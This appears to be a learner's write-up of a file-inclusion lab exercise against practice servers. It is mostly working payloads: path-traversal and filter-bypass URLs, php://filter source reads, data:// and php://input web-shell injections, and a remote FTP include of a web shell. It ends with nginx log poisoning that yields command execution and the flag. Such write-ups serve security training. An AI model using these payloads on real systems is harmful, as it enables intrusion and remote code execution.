Skills Assessment - File Inclusion

April 23, 2024

It is an nginx web server

So this is where we might do some LFI leads to RCE

http://83.136.255.150:58892/index.php?page=about

First we did try to find some LFI with Jhaddix wordlist but it returns nothing

• First ffuf = Jhaddix.txt

ffuf -u http://83.136.255.150:58892/index.php?page=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 4521,4322

Nothing

• Second ffuf - directory list medium

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.253.251:40368/FUZZ.php

Nothing

• Third ffuf - LFI Linux

ffuf -u http://83.136.253.251:40368/index.php?page=../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Wordlist-Linux -fs 4521

• Fourth fuff - default web root

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt -u http://94.237.54.170:31057/index.php?page=../../../../FUZZ/index.php -fs 4521

Still nothing

http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd

http://94.237.56.188:58604/index.php?page=./about/....//....//....//....//etc/passwd

http://83.136.254.223:54825/index.php?page=industries//....//....//....//....//....//....//etc/passwd

http://83.136.254.223:54825/index.php?page=industries//..../\..../\..../\..../\..../\..../\etc/passwd

http://83.136.254.223:54825/index.php?page=..../\..../\..../\..../\..../\..../\etc/passwd

http://83.136.254.223:54825/index.php?page=about/....\/....\/....\/....\/....\/....\/etc/passwd

http://83.136.254.223:54825/index.php?page=....\/....\/....\/....\/....\/....\/etc/passwd


http://83.136.254.223:54825/index.php?page=about//..../////....////////....////////....//////....///////....////////etc/passwd

http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd%00.php

http://94.237.56.188:58604/index.php?page=..///////..////..//////etc/passwd

http://83.136.255.150:58892/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

http://83.136.255.150:58892/index.php?page=....//....//....//....//etc/passwd

http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd%00.php

http://94.237.57.59:39554/index.php?page=../../../../../var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=page=....//....//....//....//....//var/log/nginx/access.log

http://94.237.54.170:31057/index.php?page=/var/log/nginx/access.log%00

http://94.237.57.59:39554/index.php?page=page=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fvar%2Flog%2Fnginx%2Faccess.log

Still nothing

http://83.136.255.150:35577/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/fpm/php.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=./about/....//....//....//....//etc/php/7.3/fpm/php.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=.%2Fabout%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fphp%2F7.3%2Ffpm%2Fphp.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=/var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=contact/....//....//....//....//....//var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=....//....//....//....//....//var/log/nginx/access.log

/index.php?page=php://filter/read=convert.base64-encode/resource=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%68%70%2f%37%2e%33%2f%66%70%6d%2f%70%68%70%2e%69%6e%69

Still nothing

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about/../../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00

This is the return result that is says "Invalid input detected" when i'm includidng ../../../ attack

PHP Session

This doesnt return anything

http://94.237.57.59:39554/index.php?page=page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

http://94.237.57.59:39554/index.php?page=ftp://10.10.14.166/cmd-webshell.php&cmd=id

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' 'http://94.237.56.188:58604/index.php?page=php://input&cmd=id'

HERE IS THE ANSWER

---

http://83.136.253.251:55954/index.php?page=php://filter/read=convert.base64-encode/resource=index

Then just decode it using online site

http://94.237.62.149:30835/ilf_admin/index.php?log=system.log

http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../../etc/passwd

http://94.237.62.149:43967/ilf_admin/index.php?log=../../../../../../../etc/nginx/nginx.conf

http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log

First we have to create a payload that will poison the log

With this code we can exectue RCE

curl -s 'http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log' -A '<?php system($_GET['cmd']); ?>'

Then we will just use our browser to use some commands like id

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id

Just view the files in the root directory - cd /; ls

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cd%20/;%20ls

Just cat the flag - 'cat /flag_dacc60f2348d.txt'

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cat%20/flag_dacc60f2348d.txt